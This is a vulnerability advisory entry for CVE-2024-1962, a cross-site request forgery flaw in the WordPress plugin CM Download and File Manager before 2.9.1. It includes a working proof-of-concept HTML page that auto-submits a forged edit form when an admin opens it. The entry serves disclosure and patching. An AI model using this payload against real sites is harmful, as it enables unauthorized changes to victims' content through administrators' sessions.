Lucene search
Bob MatyasWPEX-ID:469486D4-7677-4D66-83C0-A6B9AC7C503BHistoryMar 04, 2024 - 12:00 a.m.
CM Download and File Manager < 2.9.1 - Download Edit via CSRF
2024-03-0400:00:00
Bob Matyas
25
cm download
file manager
cross-site request forgery
exploit
html
security vulnerability
Description The plugin does not have CSRF checks in some places, which could allow attackers to make logged in admins edit downloads via a CSRF attack
Make an admin open an HTML file containing the following:
```
<body onload="document.forms[0].submit()">
<form action="https://example.com/cmdownload/edit/id/__ADD_ID_HERE__/" method="POST">
<input type="text" name="_edit_id" value="__ADD_ID_HERE__">
<input type="text" name="CMDM_AddDownloadForm_title" value="CSRF: Title">
<input type="text" name="CMDM_AddDownloadForm_package" value="">
<input type="text" name="CMDM_AddDownloadForm_categories[]" value="">
<input type="text" name="CMDM_AddDownloadForm_description" value="CSRF: Description">
<input type="text" name="CMDM_AddDownloadForm_screenshots_v2" value="">
<input type="text" name="CMDM_AddDownloadForm_support_notifications" value="">
<input type="submit" id="CMDM_AddDownloadForm_submit" name="CMDM_AddDownloadForm_submit" value="Update" class="button">
</form>
</body>
```Related
cve
cve
CVE-2024-1962
2024-03-25 05:15:50
cvelist
cvelist
CVE-2024-1962 CM Download and File Manager < 2.9.1 - Download Edit via CSRF
2024-03-25 05:00:02
nvd
nvd
CVE-2024-1962
2024-03-25 05:15:50
wpvulndb
wpvulndb
CM Download and File Manager < 2.9.1 - Download Edit via CSRF
2024-03-04 00:00:00
wordfence
wordfence
6.7 Medium
AI Score
Confidence
Low
0.0004 Low
EPSS
Percentile
9.1%
Related for WPEX-ID:469486D4-7677-4D66-83C0-A6B9AC7C503B